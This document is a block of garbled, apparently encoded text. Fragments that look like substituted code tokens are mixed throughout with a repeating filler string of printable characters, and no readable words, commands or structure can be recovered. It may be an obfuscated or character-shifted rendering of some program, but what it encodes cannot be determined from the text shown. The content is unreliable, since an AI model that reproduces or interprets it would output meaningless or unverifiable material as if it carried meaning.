lk
#~!~JKUR?T\OX~JKUR?T\O~T\O?JKON~+56*~#~9+,=N*50U,:]?,:=?\N~;/,.(-;7</+0>:?2.
3A=B5L6D4</?*+/.~T\O?JKONz~,=(.)@E8O9GCHVRWJ
FKYUZMIN\X]PgQ_[`SjTb^cqm*+52?4</~JKUR?T\Oz~,=(.)reaftpuhdiwsxk$lzv{n
'o}y~.*/"|#1-2%!&405(?)7*+52?4</8~JKUR?T\OXz~,=(.)38+",:6;)%
*=9>,n~*,=*+?::=~*9+(- <!/+0#
:$2.3&='516D@E849GCH;7n~9:/;?*9,~*9+<JFK>U?MINAXBPLQ_
[`SOTb^cVRWeafYpZhdi\u*+52?++9,::=r+56*zvdd925X9+,=Nz~,,=?++9,::=~*9+~%=,,=s]kglzv
{nu*+52?9$5+?,,=r+56*zvdd925X9+,=Nz~9$5+?,,=~*9+~%=,,=jo}y~q
mr"|#t-u%!&w0x($)73u*+52?9258r+56*zvdd925X9+,=Nz~*+52?91=0?9258~*9+8+',:6;.*/=9>1
(2 <!4+5#?$2.3&"'5B~*+52?91=0?9258z~91=0?8~6;=9,/816)%
*849,C-;7</F0>:?MINA=BPLQD#@ES
OTG^HVRWJaKYUZhdu++9,::=r91=0?8zv9$5+?,,=z~++9,::=?8/?/0~*9+i\X]kgl_[`n
jobycqmre|ftpu%B~!*0)/;~,;05#~!++9,::=?8/?/0z~b~*0)/;z#~!n~*0)/;~*9+#~,/8!
&wsx($)zv{+',}6~.*/"9#1#
-2 <!405#?$73n~7=28?09./~*9+8&"':1;)
%*=4>,(-;7</n~7=28?9+/2;~*9++0>:?2.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]PgQ_[`Sn~*,=*+?::=~*9+jTb^cqmreaftpuhdiwsxk$lz
v{n'o}y~.*B~u=*=:r*0)/;zr91=0?8zv,,=?++9,::=z~9052~6;=9,/8/"|#1
-2%!&405(#?)738+",:6;)%*=9>,(- <
!/+0#:$2.3&='516DB!A9052z~|tKKYLZZ]t|~6;*=1~705,*+C#~85@E849GCH;7<JFK>U?MINA
XBPLQ_[#`S
OTb^cV9052z~9052?.19*~*9+RWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t9052?.19*~+30=2\9(/19L?1/;?\N-u%!&w0x($)738+',:
6;.*m~*,=*+?::=~*9+/=9>1(2 <!4+5#?$2.3&"'516)
%*8||~,=(?,9:=92?::=~*9+49,C-;7</F0>:?MI
NA=BPLQD@ES,**=?4</~4<O,:]*50U?,:=?\NOTG^HVRWJaKYUZh
d91=0~{c~Am~9052?.19*z~&9:052C~unv,**=?4</~*9+i\X]kgl_[`njobycqmre|ft
!pu%!&wsx($)zv
{+',}6~.B~!~*,=*+?::=z~#~85*/"9#1-2 <!4
05#?$738&"':1;)%*=4>,(-;7#</+0>:?2.3A=B5L6D@E8
O9GCHVRWJFKYUZMIN\X]PgQ_B~!n~aa~7=28?09./z~#~85[`SjTb^cqm
reaft#puhdiwsxk
$lzv{n'o}y~.*/"|#1-2%!7=28?09./~9052~905R0U+9;=,\09.O3;96[?1/;?\N&405(?)738+",:6;)
%*=9>,(- <!/+0#:$2.3&!='516D@
E8B~!n~aa~7=28?9+/2;z~#~8549GCH;
7<JFK>U?MINAXBPLQ_[#`SOTb^cVRWeafY
pZhdi\s]kglzv{njo}7=28?9+/2;~9052~905R0U+9;=,\9+/2[3;96[?1/;?\Ny~qm
r"|#t-u%!&w0x($)738+',:6;.!*/=
9>1(2 <!4+5#?$2.B~!~7=28?09./z~#~853&"'516)%*8
49,C-;7</F0>:?M#I
NA=BPLQD@ESOTG^HVRWJaKY9052~+30=2\9(/19L?1/;?\N
UZhdi\X]kgl_[B~9052z~</27q~6;*5'+`njobycq
mre|ftpu%!&w#sx($)zv{+',}6~.*/"9#1-2 <
!405#?$738&"':1;)%*=B~tJ]QLOX?OLYDt4>,(-;7</+0>:?2.3A=B5L6D
@E8O9GCHVR#WJFKY
UZMIN\X]PAm~9052z~&9:052C~*18?/,9$~*9+gQ_[`SjTb^cqmreaftpuhd
iwsxk$lzv{n'o}y~.B~*+52?4</8~*18?/,9$~91=P1,X4<O*9L?1/;?\N*/"|#1-2%!&405(?)738+
",:6;)%9:/;?*9,*=
9>,(- B~!~9:/;?*9,z~#~85<!/+0#:$2.3&='516D@
E849GCH;7<JFK>#U?MINAXBPLQ_[`SOTb
^cVR9:/;?*9,z~ulmv,**=?4</~*9+WeafYpZhdi\s]kglzv{njo}y~q
mr"*18?/,9$z~ukmv,**=?4</~*9+|#t-u%!&w0x($)73
8+',:6;.*/=!9>1(2 <!4+5#?$2
.!3&"'516)%*849,C-;7</F0>
#~tJ]QLOXt:?MINA=BPLQD@
ESOTG^HVAm~9052z~&9:052C~91=0?4</~*9+RWJaKYUZhdi\
X]kgl_[`njobycqmre|ftpu%!B~*+52?4</8~91=0?4</~91=P1,X4<O*9L?1/;?\N&wsx($)zv{+',}6~.*/"
9#1-2 <!405#?$738&"':1;)9:/;?*9,%*=4>,(-;7
</+0>9:/;?*9,z~umv,**=?4</~*9+:?2.3A=B5
L6D@E8O9GCHVRWJFKYUZMI!N\X]PgQ_[`SjTb^cq
mreaftpuhdiwsxk$lzv{n#~~tY[LOXt'o}y~.*
/"Am~9052z~&9:052C~ulv,**=?4</~*9+|#1-2%
!&405(?)738+",:6;)%m~ukv,**=?4</~*9+*=9>,(- <!/+0#
:$2.3&='516D@E849G!CH;7
<JFK>U?MINAXBPLQ_[`SOTb^cV#~~~~tF]QtRWe
afYpZhdi\s]kglzvAm~9052z~&9:052C~ujv,**=?4</~*9+{njo}y~qmr"
|#t-u%!&w0x($)7B~!~||~aa~Al~9052z~&9:052C~#~853
8+',:6;.*/=9>1(2 <!4+5##
?$2.3&"'516)%|9*=;0),J|~uiv,**=?4</~*9+*849,C-;
7</F0>:?MINAB~9+29~!=BPLQD@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njobycqmre#|ftpu%!&wsx($)zv{+',}6~.
*/"9#1-2 <Al~9052z~&9:052C~uiv,**=?4</~*9+!405#
?$738&"':!1;)%*=4>,(-;7</+0>:?2.
3A=B5L6D@E8O9GCHV!RWJFKYUZMIN\X]PgQ_[`S
jTb^cqm#~~~~tPUQtre
aftpuhAm~9052z~&9:052C~uhv,**=?4</~*9+diwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(B~!~||~aa~Al~9052z~&9:052C~#~85?)738+",:6;)%*=9>,
(- <#!/+0#:$2.3&='516D@E849GCH;
7<J|9*=;0),J|~ugv,**=?4</~*9+FK>U?MINAXBPLQ_[
`SOTb^cVRWeB~9+29~!afYpZhdi\s]kglz
v#{njo}y~qmr"|#t-u%!&w0x(
Al~9052z~&9:052C~ugv,**=?4</~*9+$)738+',:6;.*
/=9>1(2 !<!4+5#?$2.3&
"'516)%*849,C-;7</F0>:?MI!NA=BPLQD@ESOTG^HVRWJ
aKYUZhdi\X]kgl_[`njobycq#~tLYZ]YRtmre|ftpu%!
&wsx(,=(?,9:=92?::=~,9:=92~9052~4</?*+/.z~,9:=9R*;=,*&Y?,:=?\N$)zv{+',}
6~.*/"9#1-2 <!405#?$73,9:=92z~ufv,**=?4</~*9+8&"':1;)%*=4>,(-;
7</+0>:?2.3A=B5L6D@E8!O9GCHVR
WJB~tLYRU]LJtFKYUZM
IN\X]PgQ_[`SjTb^cqm#reaftpuhdiwsxk
$lzv{n'o}y~.*/"|#1,=(?,925=,*?::=~,925=,*~9052~4</?*+/.z~,9:=9R*;=,*&Y?,:=?\N-2%!
&405(?)738+",:6;)%*=9>,(- ,925=,*z~uev,**=?4</~*9+<!/
+0#:$2.3&='516D@m~unmv,**=?4</~*9+E849GCH;7<J
FK>U?MINAXBPLQ_![
`SOTb^cVRWeafYpZhdi\s]kB~tR]JPYQYL[PUt
glzv{njo}y~qm#r"|#t-u%
!&w0x($)738+Am~9052z~&9:052C~ummv,**=?4</~*9+',:6;.*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,C-;7</!F0>:?MINA=BPLQD@ESOTG^HV
RWJaKYUZhd!i\X]k
gl_[`njob!ycqmre|ftpu%!&wsx($)zv
{+',}6~.*/"9#1-2 B~!~7=28?9+/2;z~#~85<!405#?$738&"':1;)%*=
4>,(-;7#</
+0>:?2*+52?4</~,**=?4</~4<O,:]:52=H9*=9,[?,:=?\N.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]PA:09~*+52?4</z~&9:052C~4</?::=?'90~*9+gQ_[`SjTb^cqmreaft
puhd,=(?,9:=92?::=z~u,=(?,9:=92r4</?::=?'90zvdd++9,::=~*9+iwsxk$lzv{n'o}y~.*/"|#1-2%
!&4n~*,=*+?::=~*9+05(?)738+",:6;)%
*=9>,(- <!/n~7=28?9+/2;~*9++0#:$2.3&='516D
@!E849GCH;7<JFK>U?MINAXBP
!LQ_[`SOTb^cVR
WeafYpZh!di\s]kglzv{n
jo}y~qmr"|#t-u%!&w0x($)73!8+',:6;.*/=9>1(2 <!4
+5#?$2.3&"'516)%*849,C-;!7</F0>:?MI
NA=BP!LQD@ESOTG
^HVRWJaKYUZhdi\X]kgl_[#~!~L]H?LYZ]YR~LYZ]YR~YPUR~4</?*+/.~#~,9:=9R*;=,*&Y?,:=?\N~;/,.`njobycqmre|ftpu%
!&wsx($)zv{+',}6~.*/"9052~YPURz~,=(.)9#1-2 <
!4,9:=92~LYZ]YRz~,=(.)05#?$7
38&"':1;)%*=4>,(-;7,=(?,9:=92~L]H?LYZ]YRz~,=(.)</+0>:?2.3A=B5
L6D@E8O9GCHVRWJFKYAA:09~m~9052z~970=,2C~05/4C~*,=.?,9:=92~*9+UZMI
N\X]PgQ_[`SjTb^cqmreaftpuhA*,=.?,9:=92z~|B~*+,58~705,*+C~*+9*?*+8?*+~*9+diw
sxk$lzv{n'o}y~.*Am~s~*+9*?*+8?*+z~,.&9C~*,=*+?*+~*9+/"|#1-2%!&4
05(?)738+",:6;)||~,=(?,9:=92~*9+%
*=9>,(- <!/+0#:$2.3&='5B!mq~a}~*+9*?*+8?*+z#~85
16D@E849GCH;7#<JFK>U?M
INAXBPLQ_[`SA*,=.?,9:=92z~|B~*+=2~705,*+C~*+9*?*+2?*+~*9+OTb^cVRWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t-u%!&wAm~q~*+9*?*+2?*+z~,.&9C~:09?*+~*9+0x($)738+',:6;.*/=9>1(2 
<!4+5#?$2.B!mq~a}~*+9*?*+2?*+z#~853&"'5
16)%*849,#C-;7</F0>:?MINA=BPLQD@
ESOTG^HVRWJaKYUZhA:09?*+z~*,=*+?*+z~*,=.?,9:=92z~970=,~705,*+C~,9:=92~*9+di\X]kgl_[`njobycqmre
|ftpu%!B9+29~!&w
sx($)z#v{+',}6~.*/"9#1-2 <
!405#?$738&"':A:09~*,=*+?*+z~*,=.?,9:=92z~970=,~705,*+C~,9:=92~*9+1;)%*=4>,(-;7</+0>
:?2.!3A=B5L6D@E8O9GCHVRWJFKYUZM
IN\B9+29~!X]PgQ_[`SjTb^cqm
reaftpuhdiw#sxk$lzv{n'o}y~.
*A*,=.?,9:=92z~CB~*+,58~705,*+C~*+9*?*+8?*+~*9+/"|#1-2%!&405(?)738+",:
B~!mq~a}~*+9*?*+8?*+z~#~856;)%*=9>,(- <
!/+0#:$2#.3&='516D@E8
49GCH;7<JFK>U?MINAXBPLQ_[A*,=.?,9:=92z~AB~*+=2~705,*+C~*+9*?*+2?*+~*9+`SOTb^cVRWeafYpZhdi\
s]kglzv{njo}y~qmr"|#t-u%Am~q~*+9*?*+2?*+z~,.&9C~:09?*+~*9+!&w0x($)73
8+',:A:09?*+z~Am~s~*,=*+?*+z~,.&9C~*,=.?,9:=92z~970=,~705,*+C~,=(?,9:=92~*9+6;.*/=9>1
(2 <!4+5#?$2.3&"'516)%u*+52?91=0?::=r4</?*+/.zvdd*+/Nz~,,=?91=0?::=~*9+*849,C-;7</F0>:?M
INA=BPLQD@ESOTG^HVRWJu*+52?,=(?1/1?::=r4</?*+/.zvdd*+/Nz~,,=?,=(?1/1?::=~*9+~%=,,=aKYUZhd
i\|,=H?2;J?\N|~91=0?::=~*9+X]kgl_
[`njobycqmre|ftpu%!A91=0?::=z~,,=?91=0?::=z~6;,=9+2C~&9:05?::=~*9+&wsx($)zv{+',}
6~.*/"9#1-2 <!405#B~!~mq~a}~&9:05?::=z~#~85?$73
8&"':1;)%*=4>,(-;7</+0>:?2#.3A
=B5L6D@E8O9GCHVRAAm~q~&9:05?::=z~,.&9C~,,=?91=0?::=z~&9:052C~&9:05?::=~*9+WJFKYUZMIN\
X]PgQ_[`SjTb^cqu&9:05?::=zv,,=?,=(?1/1?::=z~*+52?1/1?::=~*9+m
reaftpuhdiwsxk$lzv{n'o}||~,9:=92~*9+
y~.*/"|#1-2%!B~*+52?1/1?::=z~9052~6;=9,/8&405(?)7
38+",:6;)%*=#9>,(- <!/+0#:$2.3&='516D@
E849GCH;7<JFK>U?MINAAn~9052z~&9:052C~,=(~*9+XBPLQ_[`SOTb^cVRWeafYpZh
di\s]kglzvAm~9052z~&9:052C~9)2=(~*9+{njo}
y~qmr"|#tB~!~,=(?,9:=92z~aa~,=(z~#~85-u%!&w0x($)738+',:6;.*
/=9>1(2 <!4+5#?$2#.3&"'516)%*849,C-;7</
F0>:?MI9)2=(z~,9:=92~*9+NA
=BPLQD3=9,<@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njob!ycqmre|ftpu%!&wsx(
$)zv!{+',}6~.*/"9#1-2 <!405#?$7
38&B~9+29~!"':1;)%*=4>,(-;7
</+0>:?2.3A#=B5L6D@E8O9GCHV
R||~,9:=92~*9+WJFKYUZMIN\X]PgQ_[`SjTb
!^cqmreaftpuhd
iwsxk$lzB~9+29~!v{n'o}y~.*/"
|#1-2%!&405(?)738+",:6;)%#*=9>,(- <!/+0#:$2.3&
='516D@E849GCH;7<JFK>U?M*,=.?,9:=92z~~,9:=92~*9+INAXBPLQ_[
`SOTb!^cVRWeafY
pZhdi\s]kglzv{njo}y~qm!r"|#t-u%!&w0x($)7
38+',:6;.*/=9>1(2 <!4!+5#?$2.
3&#~!LJJ]?T\O#~4<O,:]*50U?,:=?\N~;/,."'516)
%*849,C-;7</F0>:?MI,**=?4</~LJJ]?T\Oz~,=(.)NA=BPLQD@ESOTG
^HVRWJaKYUZhdi\X]k91=0?::=~{c~~~~~~~~~~||~unv,**=?4</~*9+gl_[
`njobycqmre|ftpu%!&wsx($)z*=1,/8?::=~{c~~~~~~~~~~||~umv,**=?4</~*9+v{+
',}6~.*/"9#1-2 <9;,/8?::=~{c~~~~~~~~~~||~ulv,**=?4</~*9+!405#?$738&
"':1;)%*=4>,(-;+)*=*+?9;,/8?::=~{c~~~~~~~~~~~m~ukv,**=?4</~*9+7
</+0>:?2.3A=B5L6D@E8O9G&=1?::=~{c~~~~~~~~~~||~ujv,**=?4</~*9+
CHVRWJFKYUZMI+)*=*+?&=1?::=~{c~~|9*=;0),J|~uiv,**=?4</~*9+N\X]PgQ_
[`SjTb^cqmre051?::=~{c~~~~~~~~~~||~uhv,**=?4</~*9+aftpuhdiwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(?)738++)*=*+?051?::=~{c~~|9*=;0),J|~ugv,**=?4</~*9+",:6;)%*=9>,(- <!/+0#:$2
.3&='516D@,9:=92?::=~{c~~~~~~~~~~||~ufv,**=?4</~*9+E849G
CH;7<JFK>,925=,*?::=~{c~~~~~~~~~~||~uev,**=?4</~*9+U?MINAXBPLQ_[`SOTb^cVR
WeafYpZhdi\s]kglz+)*=*+?,925=,*?::=~{c~~~~~~~~~~m~unmv,**=?4</~*9+v{njo}y~qmr"|#t-u%!&w
0x($)732=*0919,;05?::=~{c~~~~~~~~~||~ummv,**=?4</~*9+8+
',:6;.*18/,9$?::=~{c~~~~~~~~~||~ulmv,**=?4</~*9+*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,91=0?*18/,9$?::=~{c~~~~~~~~~||~ukmv,**=?4</~*9+C-;7</F0>:?MINA=BP
LQD@!ESOTG^HVRWJaKYUZhdi\X]kgl_
[`n#~!JKUR?T\O?JQX~JKUR?T\O?ZZ]#~4<O::]*&9J9*=9,[?,:=?\N~;/,.jobycqmre|ftpu%!
&wsx($)zv{+*+52?4</?::=~JKUR?T\O?ZZ]z~,=(.)',}6~.*/"9#1-2 
<*+52?4</?*18~JKUR?T\O?JQXz~,=(.)!405#?$738&"':1;)%*=4>,
|*&9J|~91=0?::=~*9+(-;7</+0>:?2.
3A=B5L6D9:/;?*9,~*+52?4</?::=~91=0?::=~91=P1,X4<O*9L?1/;?\N@E8O9GCHVRWJ
FKYUZMIN\X]PgQ_[`SjTb^cqm!~0,)*9,~#~!9:/;?*9,z#~85reaftpuhdiwsxk$lzv{n
'o}y~.*/"|#1-2%!&405(?)7|705,*K|~91=0?*18~*9+38+",:6;)%
*=9>,9:/;?*9,~*+52?4</?*18~91=0?*18~91=P1,X4<O*9L?1/;?\N(- <!/+0#
:$2.3&='516D@E849GCH;7B~!~n~aa~9:/;?*9,z~#~85<JFK>U?MINAXBPLQ_
[`SOTb^cVRWeafYpZhdi\#s]kglzv
{n|705,*K|~unv,**=?4</?,*+?*18~*9+jo}y~q
mr"|#t-u%!&w0x($)73|705,*K~*&9J|~umv,**=?4</?,*+?*18~*9+8+',:6;.*/=9>1
(2 <!4+5#?$2.3&"'5n~ulv,**=?4</?,*+?*18~*9+16)%
*849,C-;7</F0>:?MINA=BPLQDn~ukv,**=?4</?,*+?*18~*9+@ES
OTG^HVRWJaKYUZhdn~ujv,**=?4</?,*+?*18~*9+i\X]kgl_[`n
jobycqmre|ftpu%n~uiv,**=?4</?,*+?*18~*9+!
&wsx($)zv{+',}6~.*/"9#1n~uhv,**=?4</?,*+?*18~*9+
-2 <!405#?$73n~ugv,**=?4</?,*+?*18~*9+8&"':1;)
%*=4>,(-;7</*+52?4</?*18~,**=?4</?,*+?*18~4<O*1X9*=9,[?*18?\N+0>:?2.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]PgQ_[`SA:09~*+52?4</?*18z~&9:052C~9:/;?*9,~*9+jTb^cqmreaftpuhdiwsxk$lz
v{n'o}y~.*!/"|#1
-2%!&405(,**=?4</~4<O,:]*50U?,:=?\N?)738+",:6;)%*=9>,(- <
!/+0#:$2.3&='516D|*&9J|~unv,**=?4</~*9+@E849GCH;7<JFK>U?MINA
XBPLQ_[9:/;?*9,z~umv,**=?4</~*9+`S
OTb^cV*+52?4</?::=~,**=?4</~4<O,:]9*=9,[?,:=?\NRWeafYpZhdi\s]kglzv
{njo}y~qmr"|#tA*+52?4</?::=z~6*70922C~+::=?/0~*9+-u%!&w0x($)738+',:
6;.*AAm~q~+::=?/0z~,.&9C~*+52?4</?::=z~&9:052C~*;94</~*9+/=9>1(2 <!4+5#?$2.3&"'516)
%*8||~unv,**=?-9+1~*9+49,C-;7</F0>:?MI
NA=BPLQD@ESn~umv,**=?-9+1~*9+OTG^HVRWJaKYUZh
d|705,*K~*&9J|~ulv,**=?-9+1~*9+i\X]kgl_[`njobycqmre|ft
+::=?/0z~ukv,**=?-9+1~*9+pu%!&wsx($)zv
{+',}6~.n~ujv,**=?-9+1~*9+*/"9#1-2 <!4
05#?$738&"':1;)%*=4>,(-;7,**=?-9+1~*;94</z~,**]-9+Q*9Kdd++9,::=</+0>:?2.3A=B5L6D@E8
O9GCHVRWJFKYUZMIN\X]PgQ_,**=?-9+1~*;94</z~,**]-9+Q*2)=89Zdd++9,::=[`SjTb^cqm
reaft!puhdiwsxk
$lzv{n'o}y~.*/"|#1-2%!#~!~JKUR?ZZ]?N]L~JKUR?T\O?ZZ]~#~+9++9,::]:5.=L9*=9,[?,:=?\N~;/,.&405(?)738+",:6;)
%*=9>,(- <!/+0#:$2.3&*+52?4</?::=~JKUR?T\O?ZZ]z~,=(.)='516D@
E8*+52?::=?.=,~JKUR?ZZ]?N]Lz~,=(.)49GCH;
7<JFK>U?MINAXBPLQ_[\N7~2=</27`SOTb^cVRWeafY
pZhdi\s]kglzv{njo}||~*+52?::=?.=,~*9+y~qm
r"|#t-u%!&w0x($)738+',:6;.|F|~91=0?::=~*9+*/=
9>1(2 <!4+5#?$2.4</?::=~*+52?4</?::=~91=0?::=~91=P1,X4<O*9L?1/;?\N3&"'516)%*8
49,C-;7</F0>:?MB~!~4</?::=z~#~85I
NA=BPLQD@ESOTG^HVRWJaKY#
UZhdi\X]kgl_[,**=?4</?::=~4</?::=z~9)2=(:=9,dd++9,::=`njobycq
mre|ftpu%!&w,**=?-9+1?::=~4</?::=z~,**]-9+Q:=9,dd++9,::=sx($)zv{+',}6~.*/"9#1-2 <
!405#?$738&"':1;)%*=m:5.=,~unv,**=?4</?::=~*9+4>,(-;7</+0>:?2.3A=B5L6D
@E8O9GCHVRm.=,~ufv,**=?4</?::=~*9+WJFKY
UZMIN\X]P*+52?::=?.=,~,**=?4</?::=~4<O,:]9*=9,[?,:=?\NgQ_[`SjTb^cqmreaftpuhd
iwsxk$lzv{n'o}y~.B~*+52?::=?.=,z~&9:052C~4</?::=?'90~*9+*/"|#1-2%!&405(?)738+
",:6;)%AAm~q~A*+52?::=?.=,z~6*70922C~,.&9C*=
9>,(- u;+9:rm:5.=,r++9,::=v\N7z~ulv,**=?-9+1?::=~*9+<!/+0#:$2.3&='516D@
E849GCH;7<JFK>,**=?-9+1?::=~4</?::=?'90z~,**]-9+Q*9Kdd++9,::=U?MINAXBPLQ_[`SOTb
^cVR!WeafYpZhdi\s]kglzv{njo}y~q
mr"|E|~91=0?::=~*9+|#t-u%!&w0x($)73
8+',:6;.*/=4</?::=~*+52?4</?::=~91=0?::=~91=P1,X4<O*9L?1/;?\N9>1(2 <!4+5#?$2
.B~!~4</?::=z~#~853&"'516)%*849,C-;7</F0>
#:?MINA=BPLQD@
ESOTG^HV,**=?4</?::=~4</?::=z~9)2=(:=9,dd++9,::=RWJaKYUZhdi\
X]kgl_[`njobycqmre|ftpu%!,**=?-9+1?::=~4</?::=z~,**]-9+Q:=9,dd++9,::=&wsx($)zv{+',}6~.*/"
9#1-2 <!405#?$738&"':1;)l:5.=,~unv,**=?4</?::=~*9+%*=4>,(-;7
</+0>l.=,~ufv,**=?4</?::=~*9+:?2.3A=B5
L6D@E8O9GCHVRWJFKYUZMI*+52?::=?.=,~,**=?4</?::=~4<O,:]9*=9,[?,:=?\NN\X]PgQ_[`SjTb^cq
mreaftpuhdiwsxk$lzv{nB~*+52?::=?.=,z~&9:052C~4</?::=?'90~*9+'o}y~.*
/"AAm~q~A*+52?::=?.=,z~6*70922C~,.&9C|#1-2%
!&405(?)738+",:6;)%u;+9:rl:5.=,r++9,::=v\N7z~ulv,**=?-9+1?::=~*9+*=9>,(- <!/+0#
:$2.3&='516D@E849G,**=?-9+1?::=~4</?::=?'90z~,**]-9+Q*9Kdd++9,::=CH;7
<JFK>U?MINAXBPLQ_[`SOTb^cV!RWe
afYpZhdi\s]kglzv|D|~91=0?::=~*9+{njo}y~qmr"
|#t-u%!&w0x($)74</?::=~*+52?4</?::=~91=0?::=~91=P1,X4<O*9L?1/;?\N3
8+',:6;.*/=9>1(2 <!4+5#B~!~4</?::=z~#~85
?$2.3&"'516)%#*849,C-;
7</F0>:?MINA,**=?4</?::=~4</?::=z~9)2=(:=9,dd++9,::==BPLQD@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njobycqmre,**=?-9+1?::=~4</?::=z~,**]-9+Q:=9,dd++9,::=|ftpu%!&wsx($)zv{+',}6~.
*/"9#1-2 <k:5.=,~unv,**=?4</?::=~*9+!405#
?$738&"':k.=,~ufv,**=?4</?::=~*9+1;)%*=4>,(-;7</+0>:?2.
3A=B5L6D@E8O9GCHV*+52?::=?.=,~,**=?4</?::=~4<O,:]9*=9,[?,:=?\NRWJFKYUZMIN\X]PgQ_[`S
jTb^cqmB~*+52?::=?.=,z~&9:052C~4</?::=?'90~*9+re
aftpuhAAm~q~A*+52?::=?.=,z~6*70922C~,.&9Cdiwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(u;+9:rk:5.=,r++9,::=v\N7z~ulv,**=?-9+1?::=~*9+?)738+",:6;)%*=9>,
(- <,**=?-9+1?::=~4</?::=?'90z~,**]-9+Q*9Kdd++9,::=!/+0#:$2.3&='516D@E849GCH;
7<J!FK>U?MINAXBPLQ_[
`SOTb^cVRWe!afYpZhdi\s]kglz
v#~!JKUR?T\O?XR~JKUR?T\O#~+*+5R::]925XR:0]32\.9K?,:=?\N~;/,.{njo}y~qmr"|#t-u%!&w0x(
*+52?4</~JKUR?T\Oz~,=(.)$)738+',:6;.*
/=9>1(2 *+52?4</?82~JKUR?T\O?XRz~,=(.)<!4+5#?$2.3&
"'516)%*849,C-;7</F0>:?MIB*+52?4</z~*;94</~6;=9,/8NA=BPLQD@ESOTG^HVRWJ
aKYUZhdi\X]kgl_[`njobycq#mre|ftpu%!
&wsx(u91=0?::=r*;94</zvdd++9,::=z~91=0?::=~*9+$)zv{+',}
6~.*/"9#1-2 <!405#?$73B91=0?::=z~6;*5'+8&"':1;)%*=4>,(-;
7</+0>:?2.3A=B5L6D@E8#O9GCHVR
WJq~~K\]F?XR~q~~QIPY?XRFKYUZM
IN\X]PgQ_[`SjTb^cqmq~~K\]D?XR~q~~K\]E?XRreaftpuhdiwsxk
$lzv{n'o}y~.*/"|#1q~KUF]\?XR~q~KUF]]?XR-2%!
&405(?)738+",:6;)%*=9>,(- q~~ZYYX?XR<!/
+0#:$2.3&='516D@q~~YQUJ?XRE849GCH;7<J
FK>U?MINAXBPLQ_#~~~~ZYYNK?XR[
`SOTb^cVRWeafYpZhdi\s]k*;94</z~*+52?4</?82~:09..=2
glzv{njo}y~qmA*;94</z~*+52?4</z~6;,=9+2C~:05?4</~*9+r"|#t-u%
!&w0x($)738+A:05?4</z~:05?4</z~*+52?4</z~9;=2.9,2C~*+52?4</~*9+',:6;.*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,C-;7</!F0>:?MINA=BPLQD@ESOTG^HV
RWJaKYUZhd!i\X]k
gl_[`njob!ycqmre|ftpu%!&wsx($)zv
{+',}6~.*/"9#1-2 !<!405#?$738&"':1;)%*=
4>,(-;7#~!JKUR?T\O~LJJ]?T\O#~4<O,:]:52=H9*=9,[?,:=?\N~;/,.</
+0>:?2,**=?4</~LJJ]?T\Oz~,=(.).3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]P*+52?4</~JKUR?T\Oz~,=(.)gQ_[`SjTb^cqmreaft
puhdn~9:/;?*9,~*9+iwsxk$lzv{n'o}y~.*/"|#1-2%
!&49:/;?*9,~*+52?4</~unv,**=?4</~91=P1,X4<O*9L?1/;?\N05(?)738+",:6;)%
*=9>,(- <!/|n~a}|~+='~{c~#~!n~`~9:/;?*9,z#~85+0#:$2.3&='516D
@u*+52?1929?32<r9:/;?*9,zvdd++9,::=z~*+52?129?32<~*9+E849GCH;7<JFK>U?MINAXBP
\N7~2=</27LQ_[`SOTb^cVR
WeafYpZh#~!~m~aa~u9*5,',9(/?5)?5).v\N7z~~xx~~Au9*5,',9(/?5)?5).v\N7~+*+5&9~/805C~#~85di\s]kglzv{n
jo}y~qmr"|#t-u%!&w0x($)73,**=?::=~9:/;?*9,z~9)2=(:=9,dd++9,::=8+',:6;.*/=9>1(2 <!4
+5#?$2.3&"'516)%*849,C-;A,**=?::=~+91=0~%=,,=C~+91=0?,,=~*9+7</F0>:?MI
NA=BPA+91=0?,,=z~6*70922C~092?,,=~*9+LQD@ESOTG
^HVRWJaKYUZhdi\X]kgl_[#~!~4~,;05~#~!~092?,,=z~b~4z~#~!~n~4~*9+~#~,/8`njobycqmre|ftpu%
!&wsx($)zv{+',}6~.*/"#~Au4zv,**=?4</z~||~6;*=1~705,*+C~859#1-2 <
!4u4zv,**=?::=z~u4zv,**=?4</~*9+05#?$7
38&"':1;)%*=4>,(-;7!</+0>:?2.3A=B5
L6D@E8O9GCHVRWJFKY!UZMI
N\X]PgQ_[`SjTb^cqmreaftpuh!diw
sxk$lzv{n'o}y~.*A9:/;?*9,z~*+52?4</z~6;,=9+2C~&9:05~*9+/"|#1-2%!&4
05(?)738+",:6;)A&9:05z~&9:05z~*+52?4</z~9;=2.9,2C~*+52?4</~*9+%
*=9>,(- <!/+0#:$2.3&='59:/;?*9,z~*;94<O9*929Z?1/;?\N
16D@E849GCH;7!<JFK>U?M
INAXBPLQ_[`S#~Aufv,**=?4</z~||~6;*=1~705,*+C~85OTb^cVRWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t-u%!&w#~!~m~aa~Aunv,**=?4</z~6*7092~705,*+C~#~850x($)738+',:6;.*/=9>1(2 
<!4+5#?$2.unv,**=?4</z~ufv,**=?4</~*9+3&"'5
16)%*849,!C-;7</F0>:?MINA=BPLQD@
ESOTG^HVRWJaKYUZh!di\X]kgl_[`njobycqmre
|ftpu%!*+52?4</~,**=?4</~4<O,:]9*=9,[?,:=?\N&w
sx($)z#~!~n~`~A*+52?129?32<z~6*70922C~xx~A*+52?129?32<~+*+5&9~/805C~#~85v{+',}6~.*/"9#1-2 <
!405#?$738&"':A:09~*+52?4</z~&9:052C~4</?::=~*9+1;)%*=4>,(-;7</+0>
:?2.#~*+52?129?32<z~129?32<~6;=9,/83A=B5L6D@E8O9GCHVRWJFKYUZM
IN\4</?::=z~u4</?::=?1929r129?32<zvdd*091929?3;/2<~*9+X]PgQ_[`SjTb^cqm
reaftpuhdiw#~!~Au,90'/r129?32<zvdd*091929?3;/2<~+*+5&9~/805C}~#~85sxk$lzv{n'o}y~.
*|YPOP|~u,90'/r129?32<zvdd*091929?3;/2<~*9+/"|#1-2%!&405(?)738+",:
